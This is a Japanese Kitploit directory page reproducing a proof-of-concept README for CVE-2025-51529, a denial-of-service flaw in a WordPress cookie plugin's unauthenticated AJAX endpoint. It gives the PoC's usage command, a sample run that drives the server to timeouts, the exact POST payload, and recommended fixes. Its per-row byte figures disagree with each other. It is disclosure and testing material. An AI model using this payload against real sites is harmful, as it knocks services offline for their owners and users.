Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-51529 — jonkastonka Cookies and Content Security Policy プラグイン バージョン 2.29 までの AJAX エンドポイント機能における不適切なアクセス制御 | Kitploit
ツール/GitHubGitHub/piotrmaciejbednarski/cve-2025-51529
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubpiotrmaciejbednarski/cve-2025-51529

CVE-2025-51529

jonkastonka Cookies and Content Security Policy プラグイン バージョン 2.29 までの AJAX エンドポイント機能における不適切なアクセス制御

リポジトリを見る
61年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-51529: WordPress Cookies and Content Security Policy プラグインの DoS 脆弱性

jonkastonka 製 Cookies and Content Security Policy プラグイン(バージョン 2.29 まで)の AJAX エンドポイント機能における不正なアクセス制御により、リモート攻撃者が wp_ajax_nopriv_cacsp_insert_consent_data エンドポイントへの無制限のデータベース書き込み操作を介して、サービス拒否(データベースサーバーのリソース枯渇)を引き起こす可能性があります。

この脆弱性は、WordPress の AJAX エンドポイント(wp-admin/admin-ajax.php)を通じて認証なしで公開されている cacsp_insert_consent_data() 関数に存在します。プラグインは wp_ajax_nopriv_ アクションを使用しているため、認証されていないユーザーがアクセス可能です。

攻撃ベクトル: リモート攻撃者は無制限の同時 POST リクエストを送信し、データベースサーバーを書き込み操作で圧倒して、CPU およびディスク I/O の枯渇を引き起こす可能性があります。

脆弱性の詳細

  • CVE ID: CVE-2025-51529
  • ステータス: RESERVED
  • タイプ: アクセス制御の不備 / サービス拒否 (Denial of Service)
  • 製品: Cookies and Content Security Policy プラグイン(バージョン 2.29 まで)
  • ベンダー: Johan Jonk Stenstroem (jonkastonka)
  • 影響を受ける関数: cacsp_insert_consent_data()
  • 攻撃ベクトル: リモート
  • 発見者: Piotr Bednarski

必要条件

  • Python 3.x
  • requests
  • matplotlib
  • threading

使用方法

PoC スクリプトの基本的な使用法は以下の通りです:

root@kitploit:~
python payload.py --target <target_url> --threads <number_of_threads>

デフォルトでは、スレッド数は 100 に設定されています。第 2 引数として指定することで、異なるスレッド数を設定できます。

出力例

DoS Attack Chart

root@kitploit:~
Target WordPress URL (https://example.com): https://vulnerable-site.com
Number of threads (default 100): 

Launching DoS attack with 100 threads...
Press Ctrl+C to stop the attack

[19:41:20] ✓ Status: 200 | Response time: 538.3ms | DB: 0.00MB (1 rows, 351b/row)
[19:41:20] ✓ Status: 200 | Response time: 554.51ms | DB: 0.00MB (2 rows, 351b/row)
[19:41:20] ✓ Status: 200 | Response time: 522.29ms | DB: 0.00MB (3 rows, 351b/row)
[19:41:20] ✓ Status: 200 | Response time: 498.72ms | DB: 0.00MB (4 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 946.94ms | DB: 0.00MB (5 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 858.41ms | DB: 0.00MB (6 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 922.29ms | DB: 0.00MB (7 rows, 351b/row)
[19:41:21] ✓ Status: 200 | Response time: 991.41ms | DB: 0.00MB (8 rows, 351b/row)
...
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding
[19:41:26] ⚠ TIMEOUT - server not responding

仕組み

エクスプロイトは以下のデータを含む POST リクエストを /wp-admin/admin-ajax.php に送信します:

root@kitploit:~
data = {
    'action': 'cacsp_insert_consent_data',
    'accepted_cookies': 'necessary,experience,analytics,marketing',
    'expires': "9" * 255  # Maximum TINYTEXT length
}

各成功したリクエストは、以下の内容を含む新しいデータベース行を挿入します:

  • タイムスタンプ (19 バイト)
  • IP アドレス (~13 バイト)
  • Cookie 設定 (可変)
  • 有効期限データ (最大 255 バイト)
  • サイト ID (1 バイト)
  • MySQL オーバーヘッド (~22 バイト)

結果: 1 リクエストあたり約 89 バイト × 無制限のリクエスト = データベースの急激な増加

推奨される修正

  • AJAX コールに nonce 検証を追加
  • IP ごとのレート制限を実装
  • ユーザー入力を適切に検証

免責事項

この PoC は教育目的のみです。作者は、このコードの使用によって引き起こされた誤用や損害について一切の責任を負いません。テストする前に、必ずシステムの許可を得てください。

ツールをダウンロード